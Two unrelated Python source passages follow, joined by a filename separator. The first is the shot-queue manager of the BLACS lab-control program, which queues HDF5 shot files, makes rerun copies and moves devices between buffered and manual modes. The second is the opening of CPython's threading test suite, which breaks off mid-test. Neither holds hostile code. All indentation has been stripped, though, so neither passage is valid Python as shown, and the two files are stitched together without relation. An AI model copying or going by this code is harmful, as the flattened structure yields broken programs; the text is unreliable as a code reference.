# Convert to standard platform-specific paths, since Qt otherwise returns forward slashes:
shot_files = [os.path.abspath(str(shot_file)) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
if filepath.endswith('.h5'):
self.process_request(str(filepath))
def _delete_selected_items(self):
index_list = self._ui.treeview.selectedIndexes()
while index_list:
self._model.takeRow(index_list[0].row())
index_list = self._ui.treeview.selectedIndexes()
def _move_up(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
def _move_down(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row below it is not selected
# (note that while a row below may have been initially selected, it should by now be one row lower
# since we start moving elements of the list downwards starting from the highest index)
if row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Reinsert the selected row one position below
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
def _move_top(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
def _move_bottom(self):
selection_model = self._ui.treeview.selectionModel()
# Create a list of selected row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row below it is not selected
# (note that while a row below may have been initially selected, it should by now be one row lower
# since we start moving elements of the list downwards starting from the highest index)
while row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Reinsert the selected row one position below
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
@inmain_decorator(True)
def append(self, h5files):
for file in h5files:
item = QStandardItem(file)
item.setToolTip(file)
self._model.appendRow(item)
@inmain_decorator(True)
def prepend(self,h5file):
if not self.is_in_queue(h5file):
self._model.insertRow(0,QStandardItem(h5file))
def process_request(self,h5_filepath):
# check connection table
try:
new_conn = ConnectionTable(h5_filepath, logging_prefix='BLACS')
except Exception:
return "H5 file not accessible to Control PC\n"
result,error = inmain(self.BLACS.connection_table.compare_to,new_conn)
if result:
# Has this run file been run already?
with h5py.File(h5_filepath) as h5_file:
if 'data' in h5_file['/']:
rerun = True
else:
rerun = False
if rerun or self.is_in_queue(h5_filepath):
self._logger.debug('Run file has already been run! Creating a fresh copy to rerun')
new_h5_filepath, repeat_number = self.new_rep_name(h5_filepath)
# Keep counting up until we get a filename that isn't in the filesystem:
while os.path.exists(new_h5_filepath):
new_h5_filepath, repeat_number = self.new_rep_name(new_h5_filepath)
success = self.clean_h5_file(h5_filepath, new_h5_filepath, repeat_number=repeat_number)
if not success:
return 'Cannot create a re-run of this experiment. Is it a valid run file?'
self.append([new_h5_filepath])
message = "Experiment added successfully: experiment to be re-run\n"
else:
self.append([h5_filepath])
message = "Experiment added successfully\n"
if self.manager_paused:
message += "Warning: Queue is currently paused\n"
if not self.manager_running:
message = "Error: Queue is not running\n"
return message
else:
# TODO: Parse and display the contents of "error" in a more human readable format for analysis of what is wrong!
message = ("Connection table of your file is not a subset of the experimental control apparatus.\n"
"You may have:\n"
" Submitted your file to the wrong control PC\n"
" Added new channels to your h5 file, without rewiring the experiment and updating the control PC\n"
" Renamed a channel at the top of your script\n"
" Submitted an old file, and the experiment has since been rewired\n"
"\n"
"Please verify your experiment script matches the current experiment configuration, and try again\n"
"The error was %s\n"%error)
return message
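# process_request returns a human-readable status string rather than raising:
# callers such as the drag-and-drop handler (via add_to_queue),
# restore_save_data and the repeat logic treat the returned string as a
# status message to log or display, so both success and the various failure
# modes come back as text.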
def new_rep_name(self, h5_filepath):
basename, ext = os.path.splitext(h5_filepath)
if '_rep' in basename and ext == '.h5':
reps = basename.split('_rep')[-1]
try:
reps = int(reps)
except ValueError:
# not a rep
pass
else:
return ''.join(basename.split('_rep')[:-1]) + '_rep%05d.h5' % (reps + 1), reps + 1
return basename + '_rep%05d.h5' % 1, 1
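# Illustrative examples (hypothetical paths):
# new_rep_name('/shots/foo.h5')          -> ('/shots/foo_rep00001.h5', 1)
# new_rep_name('/shots/foo_rep00004.h5') -> ('/shots/foo_rep00005.h5', 5)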
def clean_h5_file(self, h5file, new_h5_file, repeat_number=0):
try:
with h5py.File(h5file, 'r') as old_file:
with h5py.File(new_h5_file, 'w') as new_file:
groups_to_copy = [
'devices',
'calibrations',
'script',
'globals',
'connection table',
'labscriptlib',
'waits',
'time_markers',
'shot_properties',
]
for group in groups_to_copy:
if group in old_file:
new_file.copy(old_file[group], group)
for name in old_file.attrs:
new_file.attrs[name] = old_file.attrs[name]
new_file.attrs['run repeat'] = repeat_number
except Exception as e:
# raise
self._logger.exception('Clean H5 File Error.')
return False
return True
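# clean_h5_file copies only the "input" groups of a shot (devices, globals,
# script, connection table, etc.) into a fresh file and stamps it with the
# repeat number; any acquired data in the original file is deliberately left
# behind, which is what makes the copy safe to re-run.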
@inmain_decorator(wait_for_return=True)
def is_in_queue(self,path):
item = self._model.findItems(path,column=FILEPATH_COLUMN)
if item:
return True
else:
return False
@inmain_decorator(wait_for_return=True)
def set_status(self, queue_status, shot_filepath=None):
self._ui.queue_status.setText(str(queue_status))
if shot_filepath is not None:
self._ui.running_shot_name.setText('<b>%s</b>'% str(os.path.basename(shot_filepath)))
else:
self._ui.running_shot_name.setText('')
@inmain_decorator(wait_for_return=True)
def get_status(self):
return self._ui.queue_status.text()
@inmain_decorator(wait_for_return=True)
def get_next_file(self):
return str(self._model.takeRow(0)[0].text())
@inmain_decorator(wait_for_return=True)
def transition_device_to_buffered(self, name, transition_list, h5file, restart_receiver):
tab = self.BLACS.tablist[name]
if self.get_device_error_state(name,self.BLACS.tablist):
return False
tab.connect_restart_receiver(restart_receiver)
tab.transition_to_buffered(h5file,self.current_queue)
transition_list[name] = tab
return True
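# transition_device_to_buffered runs in the main thread (via inmain_decorator)
# so it can safely touch the tab objects: it refuses to program a device that
# is already in an error state, hooks the tab's restart signal up to the queue
# manager, and asks the tab to program itself for the shot file, with results
# reported back on self.current_queue.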
@inmain_decorator(wait_for_return=True)
def get_device_error_state(self,name,device_list):
return device_list[name].error_message
def manage(self):
logger = logging.getLogger('BLACS.queue_manager.thread')
process_tree.zlock_client.set_thread_name('queue_manager')
# While the program is running!
logger.info('starting')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
# This name stores the queue currently being used to
# communicate with tabs, so that abort signals can be put
# to it when those tabs never respond and are restarted by
# the user.
self.current_queue = queue.Queue()
#TODO: put in general configuration
timeout_limit = 300 #seconds
self.set_status("Idle")
while self.manager_running:
# If the pause button is pushed in, sleep
if self.manager_paused:
if self.get_status() == "Idle":
logger.info('Paused')
self.set_status("Queue paused")
time.sleep(1)
continue
# Get the top file
try:
path = self.get_next_file()
self.set_status('Preparing shot...', path)
logger.info('Got a file: %s'%path)
except:
# If no files, sleep for 1s,
self.set_status("Idle")
time.sleep(1)
continue
devices_in_use = {}
transition_list = {}
self.current_queue = queue.Queue()
# Function to be run when abort button is clicked
def abort_function():
try:
# Set device name to "Queue Manager" which will never be a labscript device name
# as it is not a valid python variable name (has a space in it!)
self.current_queue.put(['Queue Manager', 'abort'])
except Exception:
logger.exception('Could not send abort message to the queue manager')
def restart_function(device_name):
try:
self.current_queue.put([device_name, 'restart'])
except Exception:
logger.exception('Could not send restart message to the queue manager for device %s'%device_name)
##########################################################################################################################################
# transition to buffered #
##########################################################################################################################################
try:
# A Queue for event-based notification when the tabs have
# completed transitioning to buffered:
timed_out = False
error_condition = False
abort = False
restarted = False
self.set_status("Transitioning to buffered...", path)
# Enable abort button, and link in current_queue:
inmain(self._ui.queue_abort_button.clicked.connect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,True)
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('pre_transition_to_buffered'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
start_time = time.time()
with h5py.File(path, 'r') as hdf5_file:
devices_in_use = {}
start_order = {}
stop_order = {}
for name in hdf5_file['devices']:
device_properties = labscript_utils.properties.get(
hdf5_file, name, 'device_properties'
)
devices_in_use[name] = self.BLACS.tablist[name]
start_order[name] = device_properties.get('start_order', None)
stop_order[name] = device_properties.get('stop_order', None)
# Sort the devices into groups based on their start_order and stop_order
start_groups = defaultdict(set)
stop_groups = defaultdict(set)
for name in devices_in_use:
start_groups[start_order[name]].add(name)
stop_groups[stop_order[name]].add(name)
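# Devices are grouped by their optional 'start_order'/'stop_order' device
# properties: groups are transitioned to buffered mode in ascending
# start_order below, and transitioned back to manual in ascending stop_order
# after the shot completes.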
while (transition_list or start_groups) and not error_condition:
if not transition_list:
# Ready to transition the next group:
for name in start_groups.pop(min(start_groups)):
try:
# Connect restart signal from tabs to current_queue and transition the device to buffered mode
success = self.transition_device_to_buffered(name,transition_list,path,restart_function)
if not success:
logger.error('%s has an error condition, aborting run' % name)
error_condition = True
break
except Exception as e:
logger.exception('Exception while transitioning %s to buffered mode.'%(name))
error_condition = True
break
if error_condition:
break
try:
# Wait for a device to transition_to_buffered:
logger.debug('Waiting for the following devices to finish transitioning to buffered mode: %s'%str(transition_list))
device_name, result = self.current_queue.get(timeout=2)
#Handle abort button signal
if device_name == 'Queue Manager' and result == 'abort':
# we should abort the run
logger.info('abort signal received from GUI')
abort = True
break
if result == 'fail':
logger.info('abort signal received during transition to buffered of %s' % device_name)
error_condition = True
break
elif result == 'restart':
logger.info('Device %s was restarted, aborting shot.'%device_name)
restarted = True
break
logger.debug('%s finished transitioning to buffered mode' % device_name)
# The tab says it's done, but does it have an error condition?
if self.get_device_error_state(device_name,transition_list):
logger.error('%s has an error condition, aborting run' % device_name)
error_condition = True
break
del transition_list[device_name]
except queue.Empty:
# It's been 2 seconds without a device finishing
# transitioning to buffered. Is there an error?
for name in transition_list:
if self.get_device_error_state(name,transition_list):
error_condition = True
break
if error_condition:
break
# Has programming timed out?
if time.time() - start_time > timeout_limit:
logger.error('Transitioning to buffered mode timed out')
timed_out = True
break
# Handle if we broke out of loop due to timeout or error:
if timed_out or error_condition or abort or restarted:
# Pause the queue, re add the path to the top of the queue, and set a status message!
# only if we aren't responding to an abort click
if not abort:
self.manager_paused = True
self.prepend(path)
if timed_out:
self.set_status("Programming timed out\nQueue paused")
elif abort:
self.set_status("Aborted")
elif restarted:
self.set_status("Device restarted in transition to\nbuffered. Aborted. Queue paused.")
else:
self.set_status("Device(s) in error state\nQueue Paused")
# Abort the run for all devices in use:
# need to recreate the queue here because we don't want to hear from devices that are still transitioning to buffered mode
self.current_queue = queue.Queue()
for tab in devices_in_use.values():
# We call abort buffered here, because if each tab is either in mode=BUFFERED or transition_to_buffered failed in which case
# it should have called abort_transition_to_buffered itself and returned to manual mode
# Since abort buffered will only run in mode=BUFFERED, and the state is not queued indefinitely (aka it is deleted if we are not in mode=BUFFERED)
# this is the correct method call to make for either case
tab.abort_buffered(self.current_queue)
# We don't need to check the results of this function call because it will either be successful, or raise a visible error in the tab.
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# disconnect abort button and disable
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE! #
##########################################################################################################################################
# Get front panel data, but don't save it to the h5 file until the experiment ends:
states,tab_positions,window_data,plugin_data = self.BLACS.front_panel_settings.get_save_data()
self.set_status("Running (program time: %.3fs)..."%(time.time() - start_time), path)
# A Queue for event-based notification of when the experiment has finished.
experiment_finished_queue = queue.Queue()
logger.debug('About to start the master pseudoclock')
run_time = time.localtime()
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_starting'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
#TODO: fix potential race condition if BLACS is closing when this line executes?
self.BLACS.tablist[self.master_pseudoclock].start_run(experiment_finished_queue)
# Wait for notification of the end of run:
abort = False
restarted = False
done = False
while not (abort or restarted or done):
try:
done = experiment_finished_queue.get(timeout=0.5) == 'done'
except queue.Empty:
pass
try:
# Poll self.current_queue for abort signal from button or device restart
device_name, result = self.current_queue.get_nowait()
if (device_name == 'Queue Manager' and result == 'abort'):
abort = True
if result == 'restart':
restarted = True
# Check for error states in tabs
for device_name, tab in devices_in_use.items():
if self.get_device_error_state(device_name,devices_in_use):
restarted = True
except queue.Empty:
pass
if abort or restarted:
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# Disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
if restarted:
self.manager_paused = True
self.prepend(path)
self.set_status("Device restarted during run.\nAborted. Queue paused")
elif abort:
self.set_status("Aborted")
if abort or restarted:
# after disabling the abort button, we now start a new iteration
continue
logger.info('Run complete')
self.set_status("Saving data...", path)
# End try/except block here
except Exception:
logger.exception("Error in queue manager execution. Queue paused.")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except Exception:
repeat_number = 0
# clean the h5 file:
temp_path = tempfilename()
self.clean_h5_file(path, temp_path, repeat_number=repeat_number)
try:
shutil.move(temp_path, path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move(temp_path, path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode
self.current_queue = queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED or tab.mode == MODE_TRANSITION_TO_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
self.set_status("Error in queue manager\nQueue paused")
# disconnect and disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE OVER! #
##########################################################################################################################################
finally:
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_over'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Transition to manual #
##########################################################################################################################################
# start new try/except block here
try:
with h5py.File(path,'r+') as hdf5_file:
self.BLACS.front_panel_settings.store_front_panel_in_h5(hdf5_file,states,tab_positions,window_data,plugin_data,save_conn_table=False, save_queue_data=False)
data_group = hdf5_file['/'].create_group('data')
# stamp with the run time of the experiment
hdf5_file.attrs['run time'] = time.strftime('%Y%m%dT%H%M%S',run_time)
error_condition = False
response_list = {}
# Keep transitioning tabs to manual mode and waiting on them until they
# are all done or have all errored/restarted/failed. If one fails, we
# still have to transition the rest to manual mode:
while stop_groups:
transition_list = {}
# Transition the next group to manual mode:
for name in stop_groups.pop(min(stop_groups)):
tab = devices_in_use[name]
try:
tab.transition_to_manual(self.current_queue)
transition_list[name] = tab
except Exception as e:
logger.exception('Exception while transitioning %s to manual mode.'%(name))
error_condition = True
# Wait for their responses:
while transition_list:
logger.info('Waiting for the following devices to finish transitioning to manual mode: %s'%str(transition_list))
try:
name, result = self.current_queue.get(timeout=2)
if name == 'Queue Manager' and result == 'abort':
# Ignore any abort signals left in the queue, it is too
# late to abort in any case:
continue
except queue.Empty:
# 2 seconds without a device transitioning to manual mode.
# Is there an error:
for name in transition_list.copy():
if self.get_device_error_state(name, transition_list):
error_condition = True
logger.debug('%s is in an error state' % name)
del transition_list[name]
continue
response_list[name] = result
if result == 'fail':
error_condition = True
logger.debug('%s failed to transition to manual' % name)
elif result == 'restart':
error_condition = True
logger.debug('%s restarted during transition to manual' % name)
elif self.get_device_error_state(name, devices_in_use):
error_condition = True
logger.debug('%s is in an error state' % name)
else:
logger.debug('%s finished transitioning to manual mode' % name)
# Once device has transitioned_to_manual, disconnect restart
# signal:
tab = devices_in_use[name]
inmain(tab.disconnect_restart_receiver, restart_function)
del transition_list[name]
if error_condition:
self.set_status("Error in transtion to manual\nQueue Paused")
except Exception as e:
error_condition = True
logger.exception("Error in queue manager execution. Queue paused.")
self.set_status("Error in queue manager\nQueue paused")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
if error_condition:
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except:
repeat_number = 0
# clean the h5 file:
temp_path = tempfilename()
self.clean_h5_file(path, temp_path, repeat_number=repeat_number)
try:
shutil.move(temp_path, path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move(temp_path, path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
continue
##########################################################################################################################################
# Analysis Submission #
##########################################################################################################################################
logger.info('All devices are back in static mode.')
# check for analysis Filters in Plugins
send_to_analysis = True
for callback in plugins.get_callbacks('analysis_cancel_send'):
try:
if callback(path):
send_to_analysis = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
# Submit to the analysis server
if send_to_analysis:
self.BLACS.analysis_submission.get_queue().put(['file', path])
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('shot_complete'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Repeat Experiment? #
##########################################################################################################################################
# check for repeat Filters in Plugins
repeat_shot = self.manager_repeat
for callback in plugins.get_callbacks('shot_ignore_repeat'):
try:
if callback(path):
repeat_shot = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
if repeat_shot:
if ((self.manager_repeat_mode == self.REPEAT_ALL) or
(self.manager_repeat_mode == self.REPEAT_LAST and inmain(self._model.rowCount) == 0)):
# Resubmit job to the bottom of the queue:
try:
message = self.process_request(path)
except Exception:
# TODO: make this error popup for the user
self._logger.exception('Failed to copy h5_file (%s) for repeat run' % path)
logger.info(message)
self.set_status("Idle")
logger.info('Stopping')
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, strip_python_stderr, import_module, cpython_only
from test.script_helper import assert_python_ok, assert_python_failure
import random
import re
import sys
_thread = import_module('_thread')
threading = import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, stopped -?\d+\)>',
repr(t)))
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
_thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertTrue(not t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertFalse('daemon' in repr(t))
t.daemon = True
self.assertTrue('daemon' in repr(t))
def test_deamon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
